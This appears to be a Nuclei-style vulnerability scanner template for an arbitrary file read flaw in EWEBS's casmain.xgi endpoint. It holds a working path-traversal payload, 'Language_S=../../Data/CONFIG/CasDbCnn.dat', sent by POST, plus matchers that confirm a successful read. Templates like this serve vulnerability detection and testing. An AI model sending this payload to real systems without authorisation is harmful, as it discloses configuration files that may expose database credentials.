id: ewebs-arbitrary-file-reading

info:
  name: EWEBS casmain.xgi arbitrary file reading vulnerability
  author: pikpikcu
  severity: high
  description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter.
  reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
  tags: ewebs,lfi

requests:
  - method: POST
    path:
      - '{{BaseURL}}/casmain.xgi'
    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "Language_S=../../Data/CONFIG/CasDbCnn.dat"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[Edition]"
          - "[LocalInfo]"
        condition: and
        part: body

      - type: status
        status:
          - 200
